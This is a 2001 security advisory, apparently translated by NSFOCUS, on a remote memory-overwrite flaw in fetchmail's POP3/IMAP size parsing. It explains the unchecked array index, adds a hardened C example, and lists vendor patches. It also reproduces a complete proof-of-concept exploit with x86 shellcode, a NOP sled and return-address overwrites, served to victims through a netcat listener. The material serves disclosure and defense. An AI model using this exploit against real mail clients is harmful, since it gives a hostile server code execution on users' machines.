fetchmail Remote Memory Overwrite Vulnerability

Published: 2001-08-10
Updated: 2001-08-10

Affected systems:

Fetchmail <5.8.17
  - Debian Linux 2.2 alias potato
Description:

Fetchmail contains two remote vulnerabilities, one in pop3.c and one in imap.c, and the
two are essentially identical. Whoever controls the server side of the session can write
an arbitrary 4-byte value to an attacker-chosen location in the fetchmail process's memory.

The affected code is as follows (imap.c contains similar code):

pop3.c:

static int pop3_getsizes(int sock, int count, int *sizes)
[snip]
        while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
        {
            int num, size;

            if (DOTLINE(buf))
                break;
            else if (sscanf(buf, "%d %d", &num, &size) == 2)
                sizes[num - 1] = size;
        }
[snip]

The code above uses sscanf to extract two integers, num and size, from the POP3 (IMAP)
server's reply and then stores size in sizes[num-1]. num is never checked against count
(the number of messages the server reported earlier), so it is used as an unbounded array
index. An attacker who controls or forges the server's replies therefore controls both num
and size, which turns the assignment into a write of an arbitrary 4-byte value at an
arbitrary offset from the sizes array, for example over a saved function return address.

The attacker needs control of an IMAP/POP3 server; when a remote user runs fetchmail
against it, the attacker can execute arbitrary code on that user's host with the user's
privileges. Because fetchmail trusts the server's replies, the attack also works from a
man-in-the-middle position, for example by redirecting the client to a hostile server via
DNS spoofing.
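The following is an added example, not fetchmail code and not from the advisory's author. It shows the bounds check the pop3_getsizes() loop lacks, and computes, without dereferencing anything, where the unchecked original would have written for a given reply line. The function names (parse_size_line, unchecked_write_offset, getsizes_hardened) and the LIST reply in hostile_reply are this example's own; the reply is constructed to mirror the shape of the PoC's output. Whether a negative index actually reaches a saved return address depends on how the caller allocated sizes, so the offsets below are relative to sizes[0] only.

```c
#include <stdio.h>
#include <string.h>

/* What the hardened loop did with one line of the LIST reply. */
enum size_line { SL_DOT, SL_STORED, SL_REJECTED, SL_IGNORED };

/* Hardened counterpart of the pop3_getsizes() loop body: parse one
 * "<num> <size>" line and store size only when num lies in 1..count.
 * pop3.c as quoted in the advisory does sizes[num - 1] = size with no
 * such check. The name and return type are this example's own. */
static enum size_line parse_size_line(const char *buf, int count, int *sizes)
{
    int num, size;

    /* A lone "." terminates the multi-line reply (what DOTLINE() tests). */
    if (buf[0] == '.' && buf[1] == '\0')
        return SL_DOT;
    if (sscanf(buf, "%d %d", &num, &size) != 2)
        return SL_IGNORED;               /* not a "num size" pair; skipped */
    if (num < 1 || num > count)
        return SL_REJECTED;              /* index out of bounds; dropped */
    sizes[num - 1] = size;
    return SL_STORED;
}

/* Byte offset from &sizes[0] that the unchecked original would write
 * for this line. Pure arithmetic; nothing is dereferenced. *ok is set
 * to 0 when the line is not a "num size" pair. */
static long unchecked_write_offset(const char *buf, int *ok)
{
    int num, size;

    if (sscanf(buf, "%d %d", &num, &size) != 2) {
        *ok = 0;
        return 0;
    }
    *ok = 1;
    return ((long)num - 1) * (long)sizeof(int);
}

/* Run a whole CRLF-terminated reply through parse_size_line(). Fills
 * sizes (-1 = size unknown), returns the number of rejected lines and
 * stores the number of accepted ones in *stored. */
static int getsizes_hardened(const char *reply, int count, int *sizes, int *stored)
{
    char line[256];
    const char *p = reply;
    int rejected = 0, i;

    *stored = 0;
    for (i = 0; i < count; i++)
        sizes[i] = -1;

    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        enum size_line r;

        if (len >= sizeof line)
            len = sizeof line - 1;       /* keep the line buffer bounded */
        memcpy(line, p, len);
        line[len] = '\0';
        if (len > 0 && line[len - 1] == '\r')
            line[len - 1] = '\0';        /* strip the CR of CRLF */

        r = parse_size_line(line, count, sizes);
        if (r == SL_DOT)
            break;
        if (r == SL_STORED)
            (*stored)++;
        else if (r == SL_REJECTED)
            rejected++;
        p = nl ? nl + 1 : p + len;
    }
    return rejected;
}

/* Constructed LIST reply: two genuine entries, then two lines shaped like
 * the PoC's output (num outside 1..10, size = a pointer / NOP-sled word). */
static const char hostile_reply[] =
    "1 1024\r\n"
    "2 2048\r\n"
    "-30 -1073759596\r\n"   /* 0xbfffba94 as a signed int; would hit sizes[-31] */
    "21 -1869574000\r\n"    /* 0x90909090 as a signed int; would hit sizes[20]  */
    ".\r\n";

int main(void)
{
    int sizes[10], stored, ok;
    int rejected = getsizes_hardened(hostile_reply, 10, sizes, &stored);

    printf("stored %d, rejected %d, sizes[0]=%d sizes[1]=%d\n",
           stored, rejected, sizes[0], sizes[1]);
    printf("unchecked write for \"-30 ...\" lands %ld bytes from sizes[0]\n",
           unchecked_write_offset("-30 -1073759596", &ok));
    return 0;
}
```

The check is deliberately against count, the message count the server announced earlier in the same session, rather than against a fixed constant: a server that lies about count only wastes memory, whereas a server that sends an index outside what was allocated gets its line dropped.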

<*Source: Salvatore Sanfilippo (antirez@invece.org) *>


Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use it at your own risk!


Salvatore Sanfilippo (antirez@invece.org) provided the following test code:

/* fetchmail proof of concepts i386 exploit
* Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
* Code under the GPL license.
*
* Usage: ./a.out | nc -l -p 3333
* fetchmail localhost -P 3333 -p POP3
*
* This is a bad exploit with offset carefully selected
* to work in my own system. It will probably not work in
* your system if you don't modify RETR_OFFSET and SHELL_PTR,
* but you may try to set the SHELL_PTR to 0xAAAAAAAA
* and use gdb to obtain the proof that your fetchmail is vulnerable
* without to exploit it.
* Or just read the code in pop3.c.
*
* To improve the exploit portability you may put the shellcode inside
* one of the static char buffers, grep 'static char' *.c.
*
* Tested on fetchmail 5.8.15 running on Linux 2.4.6
*
* On success you should see the ls output.
*/

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20
#define SHELL_PTR 0xbfffba94

int main(void)
{
    int ish = SHELL_PTR;
    int ret_offset = -10;
    char shellcode[] = /* take the shellcode multiple of 4 in size */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
    int *sc = (int*) shellcode;
    int noop = 0x90909090;
    int i;

    /* +OK for user and password, then report the number of messages */
    printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
    /* Overwrite the RET pointer */
    for (i = ret_offset-20; i < ret_offset+20; i++)
        printf("%d %d\r\n", i, ish);
    /* Put some NOP */
    for (i = 1; i < 21; i++)
        printf("%d %d\r\n", i, noop);
    /* Put the shell code in the buffer */
    for (i = 21; i < 21+(sizeof(shellcode)/4); i++)
        printf("%d %d\r\n", i, *sc++);
    printf(".\r\n"); /* POP data term */
    return 0;
}




Recommendation:

Vendor patches:

1. fetchmail 5.8.17 fixes this vulnerability; the latest version can be downloaded from the vendor's home page:
http://www.tuxedo.org/~esr/fetchmail/


2. Debian Linux (http://www.debian.org/security/) has issued a security advisory for this issue:
DSA-071-1  fetchmail remote exploit
http://www.debian.org/security/2001/dsa-071

Patch download -
________________________________________________________________________

Debian GNU/Linux 2.2 alias potato

  Potato was released for alpha, arm, i386, m68k, powerpc and sparc.

  Source archives:
    http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.diff.gz
      MD5 checksum: a1ba0691be21e100b10beded89813911
    http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.dsc
      MD5 checksum: b49e9eacda18f237ae066f085647d3f7
    http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3.orig.tar.gz
      MD5 checksum: d2cffc4594ec2d36db6681b800f25e2a

  Architecture independent archives:
    http://security.debian.org/dists/stable/updates/main/binary-all/fetchmailconf_5.3.3-3_all.deb
      MD5 checksum: 223c6590b7495a41d4743d526222bc4f

  Alpha architecture:
    http://security.debian.org/dists/stable/updates/main/binary-alpha/fetchmail_5.3.3-3_alpha.deb
      MD5 checksum: 75249ba9604e732e07a1b2147b6e155e

  ARM architecture:
    http://security.debian.org/dists/stable/updates/main/binary-arm/fetchmail_5.3.3-3_arm.deb
      MD5 checksum: 80a201b1e25ff5c301ccfd2cbfa6cd8e

  Intel IA-32 architecture:
    http://security.debian.org/dists/stable/updates/main/binary-i386/fetchmail_5.3.3-3_i386.deb
      MD5 checksum: 1d9e300f957b35486e2aefcff87e43c7

  Motorola 680x0 architecture:
    http://security.debian.org/dists/stable/updates/main/binary-m68k/fetchmail_5.3.3-3_m68k.deb
      MD5 checksum: 9bdf5c4712b7dec94f644e58635bee9b

  PowerPC architecture:
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/fetchmail_5.3.3-3_powerpc.deb
      MD5 checksum: 1f97930cf7c8c4442362d6c5f27465cb

  Sun Sparc architecture:
    http://security.debian.org/dists/stable/updates/main/binary-sparc/fetchmail_5.3.3-3_sparc.deb
      MD5 checksum: fb060d4e74f6f1a84823829a21d54b19



This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.